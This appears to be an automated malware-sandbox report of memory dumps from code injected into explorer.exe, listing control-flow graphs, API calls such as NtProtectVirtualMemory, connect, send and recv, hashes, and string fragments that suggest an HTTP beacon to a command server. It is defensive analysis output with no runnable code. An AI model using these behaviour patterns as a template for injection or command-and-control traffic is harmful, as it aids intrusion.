94b6616-94b6619 618->625 621 94b6509-94b6532 call 94b6942 619->621 622 94b6538-94b6559 619->622 621->583 621->622 629 94b65e9-94b65fa 622->629 630 94b65a3-94b65a6 624->630 631 94b6574-94b659d call 94b6942 624->631 627 94b66b8-94b66bb 625->627 628 94b661f-94b6626 625->628 632 94b6739-94b673c 627->632 633 94b66bd-94b66c4 627->633 635 94b6628-94b6651 call 94b6942 628->635 636 94b6657-94b666b call 94b7e92 628->636 629->617 630->583 638 94b65ac-94b65b6 630->638 631->583 631->630 642 94b6742-94b6749 632->642 643 94b67c4-94b67c7 632->643 639 94b66c6-94b66ef call 94b6942 633->639 640 94b66f5-94b6734 633->640 635->583 635->636 636->583 658 94b6671-94b66b3 636->658 638->583 646 94b65bc-94b65e6 638->646 639->614 639->640 662 94b6894-94b68a9 640->662 650 94b674b-94b6774 call 94b6942 642->650 651 94b677a-94b67bf 642->651 643->583 647 94b67cd-94b67d4 643->647 646->629 653 94b67fc-94b6803 647->653 654 94b67d6-94b67f6 call 94b6942 647->654 650->614 650->651 651->662 660 94b682b-94b6835 653->660 661 94b6805-94b6825 call 94b6942 653->661 654->653 658->585 660->614 667 94b6837-94b683e 660->667 661->660 662->585 667->614 671 94b6840-94b6886 667->671 671->662
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: `
                                                                                • API String ID: 823142352-2679148245
                                                                                • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                • Instruction ID: 3df82afb63334e0b2755affcbe15b600d07c831dfa67900d5674e346f8c09399
                                                                                • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                • Instruction Fuzzy Hash: A0225870A18A099FCB59EF28C4997EEB7F1FB98310F41422EE45ED7250DB30A452CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 674 e480232-e480256 675 e48025c-e480260 674->675 676 e4808bd-e4808cd 674->676 675->676 677 e480266-e4802a0 675->677 678 e4802bf 677->678 679 e4802a2-e4802a6 677->679 681 e4802c6 678->681 679->678 680 e4802a8-e4802ac 679->680 683 e4802ae-e4802b2 680->683 684 e4802b4-e4802b8 680->684 682 e4802cb-e4802cf 681->682 685 e4802f9-e48030b 682->685 686 e4802d1-e4802f7 call e480942 682->686 683->681 684->682 687 e4802ba-e4802bd 684->687 691 e480378 685->691 692 e48030d-e480332 685->692 686->685 686->691 687->682 693 e48037a-e4803a0 691->693 694 e4803a1-e4803a8 692->694 695 e480334-e48033b 692->695 696 e4803aa-e4803d3 call e480942 694->696 697 e4803d5-e4803dc 694->697 698 e48033d-e480360 call e480942 695->698 699 e480366-e480370 695->699 696->691 696->697 701 e4803de-e48040a call e480942 697->701 702 e480410-e480458 NtCreateFile call e480172 697->702 698->699 699->691 704 e480372-e480373 699->704 701->691 701->702 710 e48045d-e48045f 702->710 704->691 710->691 711 e480465-e48046d 710->711 711->691 712 e480473-e480476 711->712 713 e480478-e480481 712->713 714 e480486-e48048d 712->714 713->693 715 e48048f-e4804b8 call e480942 714->715 716 e4804c2-e4804ec 714->716 715->691 721 e4804be-e4804bf 715->721 722 e4808ae-e4808b8 716->722 723 e4804f2-e4804f5 716->723 721->716 722->691 724 e4804fb-e4804fe 723->724 725 e480604-e480611 723->725 726 e48055e-e480561 724->726 727 e480500-e480507 724->727 725->693 729 e480616-e480619 726->729 730 e480567-e480572 726->730 731 e480538-e480559 727->731 732 e480509-e480532 call e480942 727->732 738 e4806b8-e4806bb 729->738 739 e48061f-e480626 729->739 735 e4805a3-e4805a6 730->735 736 e480574-e48059d call e480942 730->736 734 e4805e9-e4805fa 731->734 732->691 732->731 734->725 735->691 741 e4805ac-e4805b6 735->741 736->691 736->735 742 e480739-e48073c 738->742 743 e4806bd-e4806c4 738->743 745 e480628-e480651 call e480942 739->745 746 e480657-e48066b call e481e92 739->746 741->691 752 e4805bc-e4805e6 741->752 748 e480742-e480749 742->748 749 e4807c4-e4807c7 742->749 753 e4806f5-e480734 743->753 754 e4806c6-e4806ef call e480942 743->754 745->691 745->746 746->691 763 e480671-e4806b3 746->763 756 e48077a-e4807bf 748->756 757 e48074b-e480774 call e480942 748->757 749->691 759 e4807cd-e4807d4 749->759 752->734 769 e480894-e4808a9 753->769 754->722 754->753 756->769 757->722 757->756 764 e4807fc-e480803 759->764 765 e4807d6-e4807f6 call e480942 759->765 763->693 767 e48082b-e480835 764->767 768 e480805-e480825 call e480942 764->768 765->764 767->722 774 e480837-e48083e 767->774 768->767 769->693 774->722 778 e480840-e480886 774->778 778->769
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: `
                                                                                • API String ID: 823142352-2679148245
                                                                                • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                • Instruction ID: 924114e0609ad4d53ea4570345538aa6a09fd0848fb3c19686676e1f41c61fe4
                                                                                • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                • Instruction Fuzzy Hash: B8222A70A28B099FDB59EF28C5956AEB7E1FB98301F40462FD45ED3250DB30A855CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL ref: 0E481E67
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                • Instruction ID: 63a0d973eef3696be816f6fbfbf0448835104afe811ddce3bd159c0bcbf7e786
                                                                                • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                • Instruction Fuzzy Hash: AD015E34668B484F9B88EF6C948522AB7E4FBD9215F000B3FE99AC7254EB64D9418742
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL ref: 0E481E67
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                • Instruction ID: 6a450926403bc79d438a4f62bc23b3e6613bc2e62fef38a5fb1c2694b4771b14
                                                                                • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                • Instruction Fuzzy Hash: C901A734628B884B9744EB2C94412A6B3E5FBCE314F400B3FE5DAC3241DB21D5024782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 192 e480f82-e480fb6 193 e480fb8-e480fbc 192->193 194 e480fd6-e480fd9 192->194 193->194 195 e480fbe-e480fc2 193->195 196 e4818fe-e48190c 194->196 197 e480fdf-e480fed 194->197 195->194 198 e480fc4-e480fc8 195->198 199 e480ff3-e480ff7 197->199 200 e4818f6-e4818f7 197->200 198->194 201 e480fca-e480fce 198->201 202 e480ff9-e480ffd 199->202 203 e480fff-e481000 199->203 200->196 201->194 204 e480fd0-e480fd4 201->204 202->203 205 e48100a-e481010 202->205 203->205 204->194 204->197 206 e48103a-e481060 205->206 207 e481012-e481020 205->207 208 e481068-e48107c call e47d5b2 206->208 209 e481062-e481066 206->209 207->206 210 e481022-e481026 207->210 214 e481081-e4810a2 208->214 209->208 211 e4810a8-e4810ab 209->211 210->200 213 e48102c-e481035 210->213 215 e4810b1-e4810b8 211->215 216 e481144-e481150 211->216 213->200 214->211 217 e4818ee-e4818ef 214->217 219 e4810ba-e4810dc call e480942 215->219 220 e4810e2-e4810f5 215->220 216->217 218 e481156-e481165 216->218 217->200 221 e48117f-e48118f 218->221 222 e481167-e481178 call e47d552 218->222 219->220 220->217 224 e4810fb-e481101 220->224 227 e481191-e4811ad call e47d732 221->227 228 e4811e5-e48121b 221->228 222->221 224->217 225 e481107-e481109 224->225 225->217 230 e48110f-e481111 225->230 239 e4811b2-e4811da 227->239 233 e48122d-e481231 228->233 234 e48121d-e48122b 228->234 230->217 238 e481117-e481132 getaddrinfo 230->238 236 e481233-e481245 233->236 237 e481247-e48124b 233->237 235 e48127f-e481280 234->235 243 e481283-e4812e0 call e481d62 call e47e482 call e47de72 call e482002 235->243 236->235 240 e48124d-e48125f 237->240 241 e481261-e481265 237->241 238->216 242 e481134-e48113c 238->242 239->228 244 e4811dc-e4811e1 239->244 240->235 245 e48126d-e481279 241->245 246 e481267-e48126b 241->246 242->216 255 e4812e2-e4812e6 243->255 256 e4812f4-e481354 call e481d92 243->256 244->228 245->235 246->243 246->245 255->256 257 e4812e8-e4812ef call e47e042 255->257 261 e48135a-e481396 call e481d62 call e482262 call e482002 256->261 262 e48148c-e4814b8 call e481d62 call e482262 256->262 257->256 277 e481398-e4813b7 call e482262 call e482002 261->277 278 e4813bb-e4813e9 call e482262 * 2 261->278 271 e4814d9-e481590 call e482262 * 3 call e482002 * 2 call e47e482 262->271 272 e4814ba-e4814d5 262->272 300 e481595-e4815b9 call e482262 271->300 272->271 277->278 293 e4813eb-e481410 call e482002 call e482262 278->293 294 e481415-e48141d 278->294 293->294 297 e48141f-e481425 294->297 298 e481442-e481448 294->298 303 e481467-e481487 call e482262 297->303 304 e481427-e48143d 297->304 299 e48144e-e481456 298->299 298->300 299->300 305 e48145c-e48145d 299->305 313 e4815bb-e4815cc call e482262 call e482002 300->313 314 e4815d1-e4816ad call e482262 * 7 call e482002 call e481d62 call e482002 call e47de72 call e47e042 300->314 303->300 304->300 305->303 324 e4816af-e4816b3 313->324 314->324 327 e4816ff-e48172d call e47d6b2 324->327 328 e4816b5-e4816fa call e47d382 call e47d7b2 324->328 336 e48175d-e481761 327->336 337 e48172f-e481735 327->337 344 e4818e6-e4818e7 328->344 341 e48190d-e481913 336->341 342 e481767-e48176b 336->342 337->336 340 e481737-e48174c 337->340 340->336 345 e48174e-e481754 340->345 346 e481779-e481784 341->346 347 e481919-e481920 341->347 348 e4818aa-e4818df call e47d7b2 342->348 349 e481771-e481773 342->349 344->217 345->336 352 e481756 345->352 353 e481786-e481793 346->353 354 e481795-e481796 346->354 347->353 348->344 349->346 349->348 352->336 353->354 356 e48179c-e4817a0 353->356 354->356 359 e4817b1-e4817b2 356->359 360 e4817a2-e4817af 356->360 362 e4817b8-e4817c4 359->362 360->359 360->362 365 e4817f4-e481861 setsockopt recv 362->365 366 e4817c6-e4817ef call e481d92 call e481d62 362->366 369 e4818a3-e4818a4 365->369 370 e481863 365->370 366->365 369->348 370->369 373 e481865-e48186a 370->373 373->369 376 e48186c-e481872 373->376 376->369 378 e481874-e4818a1 376->378 378->369 378->370
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: getaddrinforecvsetsockopt
                                                                                • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                • API String ID: 1564272048-1117930895
                                                                                • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                • Instruction ID: d521067cce9c6335d6c77ab49b77c154985caf109079629b59dbf9323576241e
                                                                                • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                • Instruction Fuzzy Hash: 5D528D30614A088BDB29FF68C5947EEB7E1FB54300F504A2FC49FD7256DA70A94ACB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ObtainUserAgentString.URLMON ref: 094B19A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: AgentObtainStringUser
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 2681117516-319646191
                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction ID: fc215b64a0bace9e0d149e6297fc9666a5d9d89a1879288de26a40c477c3a9f7
                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction Fuzzy Hash: 8231DF31614A4D8BCB05EFA9C8847EEB7E4FB58214F40422FE44EDB340EE788645C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ObtainUserAgentString.URLMON ref: 094B19A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: AgentObtainStringUser
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 2681117516-319646191
                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction ID: a09d7d32604d74ba045d8753e82c2193d9ea8367f00ab648000e328236d7ca4a
                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction Fuzzy Hash: F621C330614A4D8ACB05EFA9C8947EE7BB5FF58204F40521FE45ADB340EE748605C7A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 424 94adb66-94adb68 425 94adb6a-94adb6b 424->425 426 94adb93-94adbb8 424->426 427 94adbbe-94adc22 call 94b4612 call 94b6942 * 2 425->427 428 94adb6d-94adb71 425->428 429 94adbbb-94adbbc 426->429 438 94adc28-94adc2b 427->438 439 94adcdc 427->439 428->429 430 94adb73-94adb92 428->430 429->427 430->426 438->439 440 94adc31-94adcd3 call 94b8da4 call 94b8022 call 94b83e2 call 94b8022 call 94b83e2 CreateMutexW 438->440 441 94adcde-94adcf6 439->441 440->439 455 94adcd5-94adcda 440->455 455->441
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMutex
                                                                                • String ID: .dll$el32$kern
                                                                                • API String ID: 1964310414-1222553051
                                                                                • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                • Instruction ID: bb96b145ba25143549d41eb569e3c418bc7c369796a13e880816dc243e414b7d
                                                                                • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                • Instruction Fuzzy Hash: 54416A70918A088FDB54EFA8C8987ED77E0FB68300F40527AD84ADB255DA349945CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 456 e477b66-e477b68 457 e477b93-e477bb8 456->457 458 e477b6a-e477b6b 456->458 461 e477bbb-e477bbc 457->461 459 e477bbe-e477c22 call e47e612 call e480942 * 2 458->459 460 e477b6d-e477b71 458->460 470 e477cdc 459->470 471 e477c28-e477c2b 459->471 460->461 462 e477b73-e477b92 460->462 461->459 462->457 473 e477cde-e477cf6 470->473 471->470 472 e477c31-e477cd3 call e482da4 call e482022 call e4823e2 call e482022 call e4823e2 CreateMutexW 471->472 472->470 487 e477cd5-e477cda 472->487 487->473
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMutex
                                                                                • String ID: .dll$el32$kern
                                                                                • API String ID: 1964310414-1222553051
                                                                                • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                • Instruction ID: b69e8d4c0141122a9abb283b4dd5813786a1dc7c35b170632604a8c8b70f495b
                                                                                • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                • Instruction Fuzzy Hash: 60415D70918A088FDB54EFA8C8987ED77E0FBA8301F44467BC84EDB265DE309945CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMutex
                                                                                • String ID: .dll$el32$kern
                                                                                • API String ID: 1964310414-1222553051
                                                                                • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                • Instruction ID: 04e2f8a67a5c42bfbefa451091ec6003aac56a9d0956beb372be3e748c384c15
                                                                                • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                • Instruction Fuzzy Hash: 93417970918A088FCB84EFA8C898BEDB7F0FB68300F40417AD84EDB255DE349945CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMutex
                                                                                • String ID: .dll$el32$kern
                                                                                • API String ID: 1964310414-1222553051
                                                                                • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                • Instruction ID: b153bb62cd50c4724636f81cf43a360079b828fa099dfa7b4d1702ac14003296
                                                                                • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                • Instruction Fuzzy Hash: FB413970918A088FDB94EFA8C898BED77E0FB68300F44456BC84EDB265DE309945CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 546 94b372e-94b3768 547 94b376a-94b3782 call 94b6942 546->547 548 94b3788-94b37ab connect 546->548 547->548
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944
                                                                                • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                • Instruction ID: 9fa875013e14cc665d8f0b371963cdcc9d65d0e230e3bc8e6566af3fddb2ed2d
                                                                                • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                • Instruction Fuzzy Hash: 01015A70618B188FCB94EF1CE088B55B7E0FB58324F1545AEE90DCB226CA74D8818BC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 551 e47d72e-e47d768 552 e47d76a-e47d782 call e480942 551->552 553 e47d788-e47d7ab connect 551->553 552->553
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944
                                                                                • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                • Instruction ID: bd1395226b15c476b0137f071b0d7b523ae0bd12ede1832978d055906e944860
                                                                                • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                • Instruction Fuzzy Hash: D1015E30618B188FCB84EF1CE088B55B7E0FB59314F1545AED90DCB226C674CC818BC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 556 94b3732-94b3768 557 94b376a-94b3782 call 94b6942 556->557 558 94b3788-94b37ab connect 556->558 557->558
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944
                                                                                • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                • Instruction ID: 87778a4c8e54b96f7ab34a90213ca00b361d1914899221ac96a6851f01ef29c2
                                                                                • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                • Instruction Fuzzy Hash: 0D014F70618A1C8FCB94EF5CE088B55B7E0FB59324F1541AEE80DCB226DB74C9818BC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 561 e47d732-e47d768 562 e47d76a-e47d782 call e480942 561->562 563 e47d788-e47d7ab connect 561->563 562->563
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944
                                                                                • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                • Instruction ID: 1494c1243e2a147e43ca59612add3a8cdb516eb66c6f9b2e8d9c9460c0008673
                                                                                • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                • Instruction Fuzzy Hash: 1A012C70628A1C8FCB84EF5CE088B55B7E0FB59314F1545AEA80DCB226CA74CD818BC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 782 94b36b2-94b36e5 783 94b36e7-94b36ff call 94b6942 782->783 784 94b3705-94b372d send 782->784 783->784
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID: send
                                                                                • API String ID: 2809346765-2809346765
                                                                                • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                • Instruction ID: 95ab2a6c1436f28d3c7e4ae154e7455952b5df8cef7a618146e5561be58d72ae
                                                                                • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                • Instruction Fuzzy Hash: 08015270518A088FCB84EF1CD048B2577E0FB58314F1641AED85DCB266D670D8818B81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID: send
                                                                                • API String ID: 2809346765-2809346765
                                                                                • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                • Instruction ID: fddd292839b80dd1f71675714bd1b03073898034902707af91b576da36aeb1ca
                                                                                • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                • Instruction Fuzzy Hash: 19011270518A188FDB84EF5CD048B2577E0EB58314F5545AED85DCB266C670D881CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2520472833.0000000009470000.00000040.80000000.00040000.00000000.sdmp, Offset: 09470000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_9470000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: socket
                                                                                • String ID: sock
                                                                                • API String ID: 98920635-2415254727
                                                                                • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                • Instruction ID: e70f56ef66a6ad9f57bc0e63331548011eaaaca9aaa1da38f5a2a6e52fe15486
                                                                                • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                • Instruction Fuzzy Hash: 68017C30618A188FCB84EF1CE048B50BBE0FB59314F1545AEE80ECB326C7B0C9818B82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2535197131.000000000E380000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E380000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_e380000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: socket
                                                                                • String ID: sock
                                                                                • API String ID: 98920635-2415254727
                                                                                • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                • Instruction ID: 34a0a9cf90f7458830290d4cf8482276fb221f081587b4007d4e756d5eb27cd7
                                                                                • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                • Instruction Fuzzy Hash: 12012170618A188FCB84EF1CD048B55BBE0FB59314F1545AED45ECB266C7B0C985CB86
                                                                                Uniqueness

